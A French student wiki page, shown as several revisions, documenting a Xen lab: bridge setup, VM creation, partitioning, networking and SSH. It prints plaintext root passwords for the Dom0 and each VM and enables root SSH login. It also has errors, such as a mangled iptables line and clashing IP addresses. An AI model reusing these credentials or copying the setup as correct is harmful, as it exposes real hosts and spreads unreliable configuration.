SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
mascaradeiptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.1.0/24<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11431
Atelier SysRes SE4 2025/2026 E5
2026-01-26T11:15:32Z
<p>Cpayet : /* Etape 4 : */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Ensuite après avoir reboot on peut faire :<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11429
Atelier SysRes SE4 2025/2026 E5
2026-01-26T11:10:21Z
<p>Cpayet : /* Machine Mandataire - LinusTorvalds */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
(Dans TOUTES les VM)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Ensuite après avoir reboot on peut faire :<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11424
Atelier SysRes SE4 2025/2026 E5
2026-01-26T10:55:01Z
<p>Cpayet : /* Machines de Service - CachyOS & Manjaro */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
